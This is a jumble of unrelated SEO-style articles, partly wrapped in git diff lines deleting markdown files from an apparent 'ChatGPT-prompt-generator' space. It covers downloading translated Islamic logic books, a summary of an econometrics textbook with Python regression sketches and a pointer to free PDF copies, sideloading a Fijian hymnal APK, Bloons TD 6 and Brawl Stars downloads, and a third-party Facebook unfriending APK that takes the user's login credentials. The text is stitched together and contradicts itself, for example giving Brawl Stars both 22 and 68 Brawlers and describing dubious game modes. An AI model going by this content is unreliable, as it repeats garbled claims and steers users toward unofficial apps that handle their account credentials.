In conclusion, kitab mantiq are books of logic that teach us how to think clearly, rationally, and objectively. They have a long and rich history in Islamic civilization, offer many benefits for Muslims, and help us better understand the Quran, the Sunnah, and other Islamic sciences. If you want to learn logic from kitab mantiq, you can download terjemahan kitab mantiq 144 (translations of 144 books of logic) from various online sources. However, you need to be careful and selective about the sources and formats you choose, and you need to use the translations effectively by reading, analyzing, practicing, sharing, and enjoying them.
- We hope that this article has given you some useful information and guidance on how to download terjemahan kitab mantiq 144. We encourage you to download it and start learning logic today; you will not regret it. Logic is a beautiful and powerful tool that can improve your life and your faith.
- Here are some frequently asked questions and their answers related to the topic of the article:
- Econometrics is the application of statistical methods to economic data and problems. It is a powerful tool for analyzing and predicting the behavior of economic variables, such as income, consumption, investment, prices, interest rates, exchange rates, inflation, unemployment, growth, and more. Econometrics can also help test economic theories and evaluate economic policies.
- However, econometrics is not a simple or straightforward subject. It requires a solid understanding of mathematical and statistical concepts, as well as economic theory and institutional knowledge. Moreover, econometric models are often complex and subject to various assumptions and limitations that need to be carefully examined and tested.
-That is why a good textbook on econometrics is essential for anyone who wants to learn or practice this discipline. One of the most popular and widely used textbooks on econometrics is Econometric Models and Economic Forecasts by Robert S. Pindyck and Daniel L. Rubinfeld. This book provides a comprehensive and rigorous introduction to the theory and practice of econometrics, with an emphasis on applied problems and real-world data.
- In this article, we will review some of the main topics covered in this book, and show you how you can download a free PDF version of it online.
- The core of econometrics is regression analysis, which is a method of estimating the relationship between one or more explanatory variables (also called independent variables or regressors) and a dependent variable (also called response variable or regressand). For example, we can use regression analysis to estimate how income affects consumption, how education affects earnings, how inflation affects interest rates, and so on.
- Regression analysis can be divided into two types: simple regression and multiple regression. Simple regression involves only one explanatory variable and one dependent variable, while multiple regression involves more than one explanatory variable and one dependent variable.
-In this book, Pindyck and Rubinfeld start by introducing the basic concepts of regression analysis in Chapter 1. They explain what a regression model is, how to estimate its parameters using the method of least squares, how to measure its goodness-of-fit using the coefficient of determination (R-squared), how to test hypotheses about its parameters using t-tests and F-tests, how to construct confidence intervals for its parameters and predictions, and how to interpret its results.
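- Those Chapter 1 ingredients are easy to see in miniature. The sketch below is not an example from the book; it fits a least-squares line to invented income and consumption data using Python's statsmodels package (one tool among many) and reads off the estimates, R-squared, t-statistics, and confidence intervals.
```python
# A minimal sketch on synthetic data; variable names and numbers are invented.
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(0)
income = rng.uniform(20, 100, size=200)                   # hypothetical explanatory variable
consumption = 5 + 0.8 * income + rng.normal(0, 5, 200)    # hypothetical dependent variable

X = sm.add_constant(income)             # adds the intercept column
model = sm.OLS(consumption, X).fit()    # least-squares estimation

print(model.params)      # estimated intercept and slope
print(model.rsquared)    # goodness of fit (R-squared)
print(model.tvalues)     # t-statistics for hypothesis tests
print(model.conf_int())  # 95% confidence intervals for the parameters
```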
- In Chapter 2, they review some elementary statistics that are essential for understanding regression analysis. They discuss random variables, estimation, desirable properties of estimators, probability distributions, hypothesis testing, confidence intervals, and some properties of the expectations operator.
- In Chapter 3, they focus on the two-variable regression model. They derive the formulas for the least-squares estimators of the slope and intercept parameters, show how to calculate their standard errors and variances, explain how to test hypotheses about them using t-tests, show how to perform analysis of variance (ANOVA) and calculate correlation coefficients for the model, and illustrate how to use graphical methods to visualize the model.
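- The two-variable formulas are short enough to compute by hand. Here is a rough sketch, on made-up data rather than the book's examples, of the least-squares slope and intercept, the standard error of the slope, and its t-statistic.
```python
# Minimal sketch of the two-variable least-squares formulas on synthetic data.
import numpy as np

rng = np.random.default_rng(1)
x = rng.normal(10, 2, 100)
y = 3 + 1.5 * x + rng.normal(0, 1, 100)

x_bar, y_bar = x.mean(), y.mean()
slope = np.sum((x - x_bar) * (y - y_bar)) / np.sum((x - x_bar) ** 2)
intercept = y_bar - slope * x_bar

residuals = y - (intercept + slope * x)
s2 = np.sum(residuals ** 2) / (len(x) - 2)         # residual variance
se_slope = np.sqrt(s2 / np.sum((x - x_bar) ** 2))  # standard error of the slope
t_stat = slope / se_slope                          # t-test of H0: slope = 0

print(slope, intercept, se_slope, t_stat)
```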
- In Chapter 4, they extend the analysis to the multiple regression model. They show how to estimate its parameters using matrix algebra or software packages such as Excel or Stata, how to calculate its R-squared and corrected R-squared values, how to test hypotheses about its parameters using F-tests or t-tests with adjusted degrees of freedom, how to deal with multicollinearity (a situation where some explanatory variables are highly correlated with each other), how to calculate standardized coefficients and elasticities (measures of responsiveness), and how to perform partial correlation analysis and stepwise regression (methods of selecting relevant explanatory variables).
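- For the matrix-algebra route, a bare-bones sketch looks like the following; the data are synthetic, and the code simply evaluates the least-squares formula and the R-squared and corrected R-squared described above.
```python
# Sketch of multiple regression via the matrix formula, on synthetic data.
import numpy as np

rng = np.random.default_rng(2)
n = 150
x1 = rng.normal(size=n)
x2 = rng.normal(size=n)
y = 1 + 2 * x1 - 0.5 * x2 + rng.normal(0, 1, n)

X = np.column_stack([np.ones(n), x1, x2])     # design matrix with intercept
beta = np.linalg.solve(X.T @ X, X.T @ y)      # (X'X)^{-1} X'y

fitted = X @ beta
ss_res = np.sum((y - fitted) ** 2)
ss_tot = np.sum((y - y.mean()) ** 2)
k = X.shape[1]                                # number of estimated parameters
r2 = 1 - ss_res / ss_tot
r2_adj = 1 - (1 - r2) * (n - 1) / (n - k)     # corrected (adjusted) R-squared

print(beta, r2, r2_adj)
```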
- The multiple regression model is very flexible and can be used to analyze various types of economic data and problems. In Chapter 5, Pindyck and Rubinfeld show how to use the multiple regression model in different ways.
- First, they introduce the general linear model (GLM), which is a form of multiple regression that allows for nonlinear transformations of the dependent variable or the explanatory variables. For example, we can use a GLM to estimate a Cobb-Douglas production function (a common functional form for modeling output as a function of inputs) or a logit model (a common functional form for modeling binary outcomes such as success or failure).
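- As a hedged illustration of the Cobb-Douglas case (the data and parameter values are invented, not the book's), taking logarithms turns Q = A·K^α·L^β into a linear regression of log output on log inputs:
```python
# Sketch: estimating a Cobb-Douglas production function by regressing logs.
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(3)
n = 200
capital = rng.uniform(1, 10, n)
labor = rng.uniform(1, 10, n)
output = 2.0 * capital**0.3 * labor**0.6 * np.exp(rng.normal(0, 0.1, n))

X = sm.add_constant(np.column_stack([np.log(capital), np.log(labor)]))
result = sm.OLS(np.log(output), X).fit()
print(result.params)   # intercept ~ log A, slopes ~ alpha and beta
```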
- Second, they explain how to use dummy variables (also called indicator variables or binary variables) in multiple regression. Dummy variables are variables that take only two values: 0 or 1. They are used to represent qualitative factors or categories that affect the dependent variable. For example, we can use dummy variables to capture seasonal effects (such as winter or summer), regional effects (such as north or south), policy effects (such as before or after a tax reform), or group effects (such as male or female).
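- A small sketch of the dummy-variable idea, again on made-up data: the 0/1 indicator simply shifts the intercept for the observations where it equals 1 (the "winter" label here is hypothetical).
```python
# Sketch: a 0/1 seasonal dummy shifting the intercept, on synthetic data.
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(4)
n = 120
other_factor = rng.normal(size=n)
winter = (np.arange(n) % 4 == 0).astype(float)   # hypothetical winter indicator
sales = 10 + 1.2 * other_factor + 3.0 * winter + rng.normal(0, 1, n)

X = sm.add_constant(np.column_stack([other_factor, winter]))
print(sm.OLS(sales, X).fit().params)   # coefficient on the dummy = intercept shift in winter
```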
- Third, they discuss how to use piecewise linear regression in multiple regression. Piecewise linear regression is a method of modeling nonlinear relationships by dividing the range of an explanatory variable into segments or intervals, and fitting a different linear equation for each segment or interval. For example, we can use piecewise linear regression to model income-tax schedules (which have different marginal tax rates for different income brackets) or demand curves (which may have different slopes for different price ranges).
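- One common way to set this up is to add a regressor that equals zero below the breakpoint and (x − c) above it, so the slope is allowed to change at c; the sketch below uses invented data and a single assumed breakpoint.
```python
# Sketch: piecewise linear regression with one breakpoint at x = 50.
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(5)
x = rng.uniform(0, 100, 300)
breakpoint = 50.0
y = 2 + 0.5 * x + 1.5 * np.maximum(x - breakpoint, 0) + rng.normal(0, 2, 300)

extra_slope = np.maximum(x - breakpoint, 0)        # zero below the break, x - c above it
X = sm.add_constant(np.column_stack([x, extra_slope]))
fit = sm.OLS(y, X).fit()
print(fit.params)   # slope below the break, and the change in slope above it
```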
- Fourth, they describe how to use the multiple regression model with stochastic explanatory variables. Stochastic explanatory variables are variables that are not fixed or predetermined but have their own probability distributions. For example, we can use stochastic explanatory variables to model uncertainty or risk in economic decisions (such as investment or consumption) or random shocks in economic systems (such as supply shocks or demand shocks).
- The standard assumptions of the multiple regression model include that the error term (the difference between the actual value and the predicted value of the dependent variable) has zero mean, constant variance (homoscedasticity), no serial correlation (independence), and no correlation with any explanatory variable. However, these assumptions may not always hold in practice. In Chapter 6, Pindyck and Rubinfeld examine two common violations of these assumptions: heteroscedasticity and serial correlation.
- Heteroscedasticity occurs when the error term has a different variance for different values of an explanatory variable or the dependent variable. For example, the error term may have a larger variance for higher-income households than for lower-income households, or for larger firms than for smaller firms. Heteroscedasticity can cause the standard errors of the least-squares estimators to be biased, leading to unreliable hypothesis tests and confidence intervals.
- Serial correlation occurs when the error term is correlated with itself over time or across observations. For example, the error term may have positive serial correlation if it tends to have the same sign or magnitude in successive periods, or negative serial correlation if it tends to have opposite signs or magnitudes in successive periods. Serial correlation can also cause the standard errors of the least-squares estimators to be biased, leading to unreliable hypothesis tests and confidence intervals.
-Pindyck and Rubinfeld show how to detect and correct for heteroscedasticity and serial correlation using various methods, such as graphical analysis, the Breusch-Pagan test, the White test, the Durbin-Watson test, the Cochrane-Orcutt procedure, the Hildreth-Lu procedure, and generalized least-squares estimation. They also explain the implications of heteroscedasticity and serial correlation for forecasting and model selection.
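- On the detection side, several of the tests named above ship with standard statistics libraries. As a rough sketch (the data, which are deliberately heteroscedastic, are invented, and the statsmodels calls are one possible implementation rather than the book's):
```python
# Sketch: Breusch-Pagan and Durbin-Watson tests on a fitted OLS model.
import numpy as np
import statsmodels.api as sm
from statsmodels.stats.diagnostic import het_breuschpagan
from statsmodels.stats.stattools import durbin_watson

rng = np.random.default_rng(6)
n = 200
x = rng.uniform(1, 10, n)
y = 1 + 2 * x + rng.normal(0, x)        # error variance grows with x (heteroscedastic)

X = sm.add_constant(x)
results = sm.OLS(y, X).fit()

lm_stat, lm_pvalue, f_stat, f_pvalue = het_breuschpagan(results.resid, X)
print("Breusch-Pagan p-value:", lm_pvalue)              # small p-value suggests heteroscedasticity
print("Durbin-Watson:", durbin_watson(results.resid))   # values near 2 suggest little serial correlation
```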
- Another important issue in econometrics is model specification, which refers to the choice of the functional form, the explanatory variables, and the error term for the regression model. A good model specification should reflect the underlying economic theory and data characteristics, and avoid potential problems such as omitted variables bias, measurement error, endogeneity, multicollinearity, and nonlinearity. In Chapter 7, Pindyck and Rubinfeld discuss some of these problems and how to deal with them using instrumental variables and model specification tests.
- Instrumental variables are variables that are correlated with the explanatory variables but not with the error term. They can be used to address two common sources of bias in regression analysis: correlation between an explanatory variable and the error term (endogeneity), and errors in variables (measurement error). For example, we can use instrumental variables to estimate the effect of education on earnings when education is endogenous (affected by unobserved factors such as ability or motivation) or measured with error (due to reporting errors or rounding). Pindyck and Rubinfeld explain how to use instrumental variables in single-equation and simultaneous-equation models, how to test for their validity and relevance, and how to compare their results with ordinary least-squares estimates.
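- To see the two-stage least-squares logic in miniature, the sketch below builds an invented education-and-earnings example with one instrument; the variable names are hypothetical, and a real application would use a dedicated IV routine, which also computes valid standard errors.
```python
# Sketch of two-stage least squares with one endogenous regressor and one instrument.
import numpy as np
import statsmodels.api as sm

rng = np.random.default_rng(7)
n = 500
instrument = rng.normal(size=n)                  # e.g. distance to college (hypothetical)
unobserved = rng.normal(size=n)                  # e.g. ability, correlated with schooling
education = 0.8 * instrument + 0.5 * unobserved + rng.normal(size=n)
earnings = 1.0 + 0.6 * education + unobserved + rng.normal(size=n)

# Stage 1: regress the endogenous regressor on the instrument.
Z = sm.add_constant(instrument)
education_hat = sm.OLS(education, Z).fit().fittedvalues

# Stage 2: regress the outcome on the fitted values from stage 1.
X2 = sm.add_constant(education_hat)
print(sm.OLS(earnings, X2).fit().params)   # slope is the IV estimate of the true 0.6
# Note: standard errors printed from this naive second stage are not the correct IV ones.
```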
- Model specification tests are statistical tests that can help check whether a regression model is correctly specified. They can help detect problems such as omitted variables, incorrect functional form, heteroscedasticity, serial correlation, or non-normality of the error term. For example, we can use model specification tests to determine whether we should include a quadratic term or a logarithmic term in a regression model, or whether we should use a linear probability model or a logit model for a binary dependent variable. Pindyck and Rubinfeld describe some of the most common specification tests, such as the Ramsey RESET test, the Lagrange multiplier test, the Wald test, the likelihood ratio test, and the Jarque-Bera test.
- They also discuss some methods of regression diagnostics, such as residual analysis, influence analysis, and multicollinearity diagnostics, that can help identify outliers, influential observations, or collinear variables that may affect the regression results.
- One of the main applications of econometrics is forecasting, which is the process of predicting future values of economic variables based on past data and a regression model. Forecasting can be useful for planning, decision making, policy evaluation, and scenario analysis in various fields of economics and business.
- In Chapter 8, Pindyck and Rubinfeld focus on forecasting with a single-equation regression model. They distinguish between two types of forecasting: unconditional and conditional. An unconditional forecast is made when the values of all the explanatory variables over the forecast period are known with certainty, so only the dependent variable has to be predicted. A conditional forecast is made when one or more explanatory variables are not known with certainty and must themselves be forecast or assumed before the dependent variable can be predicted.
- They also explain how to calculate the standard errors and confidence intervals for the forecasts, how to evaluate the accuracy and reliability of the forecasts, how to deal with serially correlated errors in forecasting, and how to perform dynamic forecasting (using lagged values of the dependent variable as explanatory variables).
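- For a single new observation in the two-variable model, the forecast standard error has a simple closed form. The sketch below applies it to invented data; the formula is the standard one, but the numbers are made up.
```python
# Sketch: point forecast and 95% forecast interval for a two-variable regression.
import numpy as np
from scipy import stats

rng = np.random.default_rng(8)
n = 80
x = rng.uniform(0, 20, n)
y = 4 + 1.3 * x + rng.normal(0, 2, n)

x_bar = x.mean()
slope = np.sum((x - x_bar) * (y - y.mean())) / np.sum((x - x_bar) ** 2)
intercept = y.mean() - slope * x_bar
resid = y - (intercept + slope * x)
s = np.sqrt(np.sum(resid ** 2) / (n - 2))        # standard error of the regression

x_new = 15.0
y_hat = intercept + slope * x_new
se_forecast = s * np.sqrt(1 + 1 / n + (x_new - x_bar) ** 2 / np.sum((x - x_bar) ** 2))
t_crit = stats.t.ppf(0.975, df=n - 2)
print(y_hat, (y_hat - t_crit * se_forecast, y_hat + t_crit * se_forecast))
```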
- If you are interested in learning more about econometrics or improving your econometric skills, you can download a free PDF version of this book online from various sources. However, we recommend that you purchase a hard copy or an e-book version from a reputable publisher or seller, as they may offer better quality and support.
- If you are looking for a way to download APK AI Vola Ni Sere Ni Lotu Wesele, a Fijian Methodist hymnal app, you have come to the right place. In this article, we will show you how to download and install this app on your Android device using the Google Play Store. We will also answer some frequently asked questions about APK files and how they work.
-APK AI Vola Ni Sere Ni Lotu Wesele is an app that contains the Fijian Methodist hymnal, also known as A I Vola Ni Sere Ni Lotu Wesele e Viti. This app allows you to access all 408 hymns in Fijian language, search by hymn title or number, adjust the text size and type, and switch between light and dark themes. You can also use this app offline, as it does not require an internet connection. This app is a great resource for Fijian Methodists who want to sing and worship God in their native tongue.
-APK files are the format of Android applications that you can install on your device. When you download an app from the Google Play Store, you are actually downloading an APK file that is then installed automatically. However, sometimes you may want to download an APK file directly from the Play Store, for example, if you want to save it for later use, transfer it to another device, or share it with someone else. Downloading APK files from the Google Play Store has some advantages over downloading them from other sources. First, you can be sure that the APK file is safe and free of malware, as it has been verified by Google. Second, you can choose from different versions of the app, in case you need an older or newer one. Third, you can get updates for the app from the Play Store, as long as it is still available there.
-To download APK files from Google Play Store on your desktop computer, you need a web tool that can generate download links for APK files from Play Store URLs. One such tool is [APKCombo], which is free and easy to use. Here are the steps to follow:
-You can also use other web tools such as [APKPure], [APKMirror], or [Evozi] to download APK files from Google Play Store on desktop.
-To download APK files from Google Play Store on your Android device, you need an app that can extract APK files from installed apps. One such app is [APK Extractor], which is free and simple to use. Here are the steps to follow:
-You can also use other apps such as [ML Manager], [APK Export], or [App Backup & Share Pro] to download APK files from Google Play Store on Android.
-To install APK files on your Android device, you need to enable unknown sources in your device's settings. This will allow you to install apps from sources other than the Google Play Store. Here are the steps to follow:
-You can also use other methods such as [ADB], [Split APKs Installer (SAI)], or [App Installer] to install APK files on Android.
-In this article, we have shown you how to download APK AI Vola Ni Sere Ni Lotu Wesele, a Fijian Methodist hymnal app, from the Google Play Store using different methods. We have also explained what an APK file is, how to install it on your Android device, and how to deal with some common issues related to APK files. We hope you have found this article helpful and informative. If you have any questions or feedback, please feel free to leave a comment below. Thank you for reading!
-Here are some frequently asked questions about APK files and how they work:
-What is an APK file?
-An APK file is an Android Package Kit file that contains all the components of an Android application, such as code, resources, assets, certificates, and manifest. An APK file is essentially a zip archive that can be opened with any file extractor tool. An APK file allows you to install an app on your Android device without using the Google Play Store or any other app store.
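-Because an APK is just a ZIP archive, you can list its contents with any scripting language; for example, a short Python snippet like the one below (the file name is a placeholder) prints every entry in the archive.
```python
# Sketch: listing the contents of an APK, which is an ordinary ZIP archive.
# "example.apk" is a placeholder path for whatever APK you downloaded.
import zipfile

with zipfile.ZipFile("example.apk") as apk:
    for name in apk.namelist():
        print(name)   # e.g. AndroidManifest.xml, classes.dex, META-INF/, res/
```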
-Is it safe to download APK files from third-party sources?
-Not always. Downloading APK files from third-party sources can expose your device to malware, viruses, spyware, adware, or other harmful programs that can compromise your privacy and security. Some third-party sources may also provide fake, modified, or outdated versions of apps that may not work properly or cause damage to your device. Therefore, it is recommended that you only download APK files from trusted and reputable sources, such as the Google Play Store or the app's official website. You should also scan any downloaded APK file with a reliable antivirus or anti-malware tool before installing it on your device.
-How do I update an app that I installed from an APK file?
-If you downloaded an app as an APK file from the Google Play Store, you can check for updates on the Play Store by searching for the app and tapping on the update button if available. Alternatively, you can use a web tool or an app to download the latest version of the APK file from the Play Store and install it over the existing app. However, if you downloaded an app as an APK file from a third-party source, you may not be able to get updates from the Play Store or the app's official website. In that case, you will have to manually check for updates on the third-party source, or uninstall the app and install a newer version from a trusted source.
-How do I delete an APK file from my device?
-If you want to delete an APK file from your device's storage, you can use your device's file manager to locate and delete the file. Usually, APK files are stored in the downloads folder or a specific folder created by the app that downloaded them. You can also use an app such as [Files by Google], [SD Maid], or [Clean Master] to scan and delete unwanted APK files from your device.
-How do I share an APK file with someone else?
-If you want to share an APK file with someone else, you can use a file-sharing app or service to send the file to another device. Some of the popular file-sharing apps and services are [SHAREit], [Xender], [Send Anywhere], and [Google Drive]. You can also use Bluetooth, Wi-Fi Direct, or NFC to share APK files between devices. However, before sharing an APK file, make sure that it is safe and legal to do so. You should not share APK files that are protected by copyright, contain malware, or violate any terms of service.
-Bloons TD 6 is one of the most popular and addictive tower defense games on the market. But if you want to enjoy this game without paying a dime, you might be wondering how to download it for free without getting any viruses on your device. In this article, we will show you what Bloons TD 6 is, why you should download it for free, and how to do it safely and easily.
-Bloons TD 6 is a strategy game developed by ninja kiwi, a New Zealand-based game studio that specializes in tower defense and casual games. The game is the sixth installment in the Bloons Tower Defense series, which has been around since 2007. The game has over 10 million downloads on Google Play and over 200,000 positive reviews on Steam.
- The gameplay of Bloons TD 6 is simple but challenging. You have to craft your perfect defense from a combination of powerful Monkey Towers and awesome Heroes, then pop every last invading Bloon. The game features a large roster of Monkey Towers and Heroes, many maps and game modes, Co-Op play, and community-created Challenges and Odysseys.
-Bloons TD 6 is a game that you can play anywhere and anytime. You can play it online in your browser or offline on your device. You can also switch between online and offline modes seamlessly. Playing Bloons TD 6 online or offline has many benefits, such as:
-
-- You can enjoy endless hours of strategy gaming with Bloons TD 6 without spending any money.
-- You can access thousands of community-created Challenges and Odysseys, or create your own and share them with other players.
-- You can earn Trophies to unlock dozens of cosmetic items that let you customize your Monkeys, Bloons, animations, music, and more.
-- You can play with your friends or join forces with other players from around the world in Co-Op mode.
The drawbacks of paying for Bloons TD 6
-While Bloons TD 6 is a great game, it is not free to download and play. The game costs $4.99 on Google Play and $9.99 on Steam. Plus, there are in-app purchases that can range from $0.99 to $54.99. These purchases can give you extra Monkey Money, Powers, Insta Monkeys, and other items that can make the game easier or more fun. However, paying for Bloons TD 6 has some drawbacks, such as:
-
-- You might feel like you are not getting enough value for your money, especially if you compare it to other free tower defense games.
-- You might feel pressured to buy more in-app purchases to keep up with the game's difficulty or to unlock more content.
-- You might encounter technical issues or bugs that can affect your gaming experience or cause you to lose your progress.
-- You might risk getting viruses or malware on your device if you download Bloons TD 6 from unofficial sources or use hacks or cheats.
-
- How to download Bloons TD 6 for free without viruses?
-The risks of downloading Bloons TD 6 from untrusted sources
-If you want to download Bloons TD 6 for free, you might be tempted to look for it on websites or platforms that offer cracked or modded versions of the game. However, this is not a good idea, as you might expose yourself to various risks, such as:
-
-- You might download a fake or corrupted file that does not work or damages your device.
-- You might download a file that contains viruses or malware that can steal your personal information, harm your device, or compromise your security.
-- You might violate the terms of service of ninja kiwi and get banned from playing Bloons TD 6 online or accessing its features.
-- You might miss out on the latest updates and content that ninja kiwi releases for Bloons TD 6 regularly.
-
- The best ways to download Bloons TD 6 for free without viruses
-Fortunately, there are some safe and easy ways to download Bloons TD 6 for free without viruses. Here are two of the best ways that we recommend:
- Play Bloons TD 6 online in browser with now.gg
-Now.gg is a cloud gaming platform that lets you play any Android game online in your browser without downloading anything. You can play Bloons TD 6 for free on now.gg by following these steps:
-
-- Go to https://now.gg/play/bloons-td-6 on your browser.
-- Sign up with your email or Google account.
-- Click on the "Play" button and wait for the game to load.
-- Enjoy playing Bloons TD 6 online for free without viruses.
-
- Download and play Bloons TD 6 on PC or Mac with BlueStacks
-BlueStacks is a trusted and popular Android emulator that lets you run Android apps and games on your PC or Mac. You can download and play Bloons TD 6 for free on BlueStacks by following these steps:
-
-- Go to https://www.bluestacks.com/apps/strategy/bloons-td-6-on-pc.html on your browser.
-- Click on the "Download Bloons TD 6 on PC" button and follow the instructions to install BlueStacks on your PC or Mac.
-- Launch BlueStacks and sign in with your Google account.
-- Search for Bloons TD 6 on the BlueStacks app store and click on the "Install" button.
-- Wait for the game to download and install on your PC or Mac.
-- Enjoy playing Bloons TD 6 for free without viruses.
-
- Conclusion
-Bloons TD 6 is a fun and addictive tower defense game that you can play online or offline. However, if you don't want to pay for the game, you might be looking for ways to download it for free without viruses. In this article, we showed you what Bloons TD 6 is, why you should download it for free, and how to do it safely and easily. We hope you found this article helpful and informative. Now, go ahead and enjoy popping some Bloons!
- FAQs
-Is Bloons TD 6 safe to download?
-Bloons TD 6 is safe to download if you get it from official sources, such as Google Play, Steam, now.gg, or BlueStacks. However, if you download it from unofficial sources, such as websites or platforms that offer cracked or modded versions of the game, you might risk getting viruses or malware on your device.
- Is Bloons TD 6 compatible with my device?
-Bloons TD 6 is compatible with most Android devices that have Android 5.0 or higher and at least 2 GB of RAM. It is also compatible with most Windows and Mac devices that have BlueStacks installed. However, some devices might experience performance issues or crashes due to hardware limitations or software conflicts.
- How often does Bloons TD 6 get updated?
-Bloons TD 6 gets updated regularly by ninja kiwi, usually every month or two. The updates usually add new features, content, and gameplay improvements, as well as bug fixes and balance changes. You can check the latest update notes on the official website of ninja kiwi or on the game's social media pages.
- Can I play Bloons TD 6 with my friends?
-Yes, you can play Bloons TD 6 with your friends in Co-Op mode. Co-Op mode allows you to play every map and mode with up to 3 other players in public or private games. You can also chat with your teammates and use Powers and Insta Monkeys together. To play Co-Op mode, you need to have an internet connection and a ninja kiwi account.
- Where can I get more information about Bloons TD 6?
-If you want to get more information about Bloons TD 6, you can visit the official website of ninja kiwi at https://ninjakiwi.com/, where you can find news, updates, blogs, forums, support, and more. You can also follow the game's social media pages on Facebook, Twitter, Instagram, YouTube, Discord, Reddit, and Twitch.
-
-
\ No newline at end of file
diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Ykle - Gl Brawlerslarla Oynamann Keyfini kar.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Ykle - Gl Brawlerslarla Oynamann Keyfini kar.md
deleted file mode 100644
index c45261f10948c40dcf7a557720d14a20f3b2a310..0000000000000000000000000000000000000000
--- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Brawl Stars APK Ykle - Gl Brawlerslarla Oynamann Keyfini kar.md
+++ /dev/null
@@ -1,77 +0,0 @@
-
-Brawl Stars APK Download: Fun Battles on Mobile
-Brawl Stars is the newest game from Supercell, the maker of Clash of Clans and Clash Royale. Offering fast, frantic 3v3 multiplayer battles and a battle royale mode on mobile, it lets you fight alongside friends or on your own in a variety of game modes. You can unlock and upgrade many Brawlers with powerful Super abilities, Star Powers, and Gadgets, collect unique skins to stand out and show off, and battle in mysterious locations across the Brawliverse!
-What Is Brawl Stars?
-Brawl Stars is a mix of MOBA and fast-paced hero shooter. The game has more than 22 different Brawlers, each with its own abilities and class. Some Brawlers play as tanks, some as support, some as damage dealers, and some as assassins. Every Brawler has a unique attack and Super ability, and each one also comes with a choice of two Star Powers and three Gadgets. These options raise a Brawler's performance and let you develop different strategies.
-Brawl Stars Game Features
-A Variety of Brawlers
-There are currently 68 Brawlers in the game. Some are of common rarity, some rare, some epic, some legendary, and some chromatic. Each Brawler has its own personality, appearance, voice, and animations. You can unlock Brawlers by opening Brawl Boxes or by buying them from the Shop with real money. You can also collect different skins for each Brawler; skins only change appearance and give no in-game advantage. You can get skins from Brawl Boxes, the Shop, or special events.
-Different Game Modes
-There are many different game modes in Brawl Stars. Some of them are:
-
-- Mission. In this mode, two teams try to capture a safe in the middle of the map. The safe shows the teams' scores and loses points when it comes under attack from a team. The team whose score drops to zero loses.
-- Gem Grab. In this mode, two teams try to collect the gems that come out of a mine in the middle of the map. A team's score rises as it collects gems. Once a team has collected 10 gems, a countdown starts, and the team that still holds its gems when the countdown ends wins.
-- Brawl Ball. In this mode, two teams try to take the ball in the middle and put it into the opposing goal. Each goal scored earns a point, and the first team to score two points wins.
-- Showdown. In this mode, 10 players fight to be the last one standing. Players grow stronger by collecting the power cubes found on the map. The map shrinks as time passes, pushing the players closer together.
-- Gang War. In this mode, two teams try to take down the rival gang's leader. The game ends when a leader is defeated.
-
-Constantly Evolving Content
-Brawl Stars constantly adds new Brawlers, skins, maps, game modes, and updates. The game also offers seasonal events, tournaments, quests, and rewards. Players can earn extra rewards through a pass system called the Brawl Pass, which is refreshed every season and includes new Brawlers, skins, and other items.
-How to Install the Brawl Stars APK?
-There are two ways to install Brawl Stars on your Android device: installing it from the Google Play Store or downloading an APK file. Both methods have advantages and disadvantages.
-Installing from the Google Play Store
-This is the easiest and safest method. Search for Brawl Stars on the Google Play Store and install it. You will automatically get the latest version of the game and will be able to update it easily.
-Downloading an APK File
-This method can be more cumbersome and riskier, but it is preferable in some situations. For example, you can use it in countries or on devices where Brawl Stars is not available or not compatible on the Google Play Store. You can also try different versions or features of the game through modified APK files.
-Download from Trusted Sources
-Before downloading an APK file, make sure the source is trustworthy, because some APK files can contain viruses or malware. If the Play Store version is not available or not compatible with your device, you can still install the game by downloading the APK file from a reliable site.
-Q: How can I install Brawl Stars on my iOS device?
-A: You can install Brawl Stars on an iOS device from the App Store. Follow the link on the game's official website or search for Brawl Stars in the App Store.
-Q: Is Brawl Stars free?
-A: Brawl Stars is a free game; you do not have to pay anything to download and play it. There are, however, some items that can be bought with real money inside the game. They do not affect game balance and only provide cosmetics or speed up progression.
-Q: What is the age rating for Brawl Stars?
-A: Brawl Stars is suitable for ages 7 and up. The game has non-violent, cartoon-style graphics, supports family sharing, and includes parental control settings.
-Q: Can I play Brawl Stars on my computer?
-A: Brawl Stars is officially available only on mobile platforms, but you can also play it on your computer using an Android emulator. Emulators are programs that let you run Android apps on a computer; some popular ones are BlueStacks, NoxPlayer, and MEmu. After installing an emulator, you can install Brawl Stars from the Google Play Store or from an APK file.
-
-
\ No newline at end of file
diff --git a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Download All Friends Remover APK and Get Rid of Unwanted Facebook Friends.md b/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Download All Friends Remover APK and Get Rid of Unwanted Facebook Friends.md
deleted file mode 100644
index fce7455038bdc5e2962bd75e1cf7b21b63cd0881..0000000000000000000000000000000000000000
--- a/spaces/1pelhydcardo/ChatGPT-prompt-generator/assets/Download All Friends Remover APK and Get Rid of Unwanted Facebook Friends.md
+++ /dev/null
@@ -1,124 +0,0 @@
-
-All Friends Remover for Facebook APK: How to Unfriend All Your Facebook Friends in Two Clicks
-Have you ever wanted to unfriend all your Facebook friends in one go? Maybe you are tired of seeing their posts, or you want to start fresh with a new account, or you just want to declutter your social media. Whatever the reason, unfriending hundreds or thousands of people manually can be a tedious and time-consuming task. Fortunately, there is a simple solution: All Friends Remover for Facebook APK.
-Introduction
-All Friends Remover for Facebook APK is an Android app that allows you to remove all your Facebook friends in just two clicks. It is not developed or associated with Facebook, but it uses your login credentials to access your friends list and perform the unfriending action. The app is fast, easy to use, and reliable. It can help you save time and effort, as well as improve your privacy and security on Facebook.
-How to Download and Install All Friends Remover for Facebook APK
-Since All Friends Remover for Facebook APK is not available on the Google Play Store, you will need to download it from a third-party source. One of the websites that offer the APK file is [APKCombo]. Here are the steps to download and install the app:
-
-- Go to [APKCombo] and search for "Friend Remover for Facebook".
-- Select the app with the icon of a gorilla's head and click on "Download APK".
-- Save the file on your device and locate it using a file manager app.
-- Tap on the file and allow installation from unknown sources if prompted.
-- Follow the instructions on the screen and wait for the installation to complete.
-
-Once the app is installed, you will need to grant it some permissions to access your Facebook account. These include:
-
-- Read your contacts
-- Access information about networks
-- Access information about Wi-Fi networks
-- Open network sockets
-- Write to external storage
-
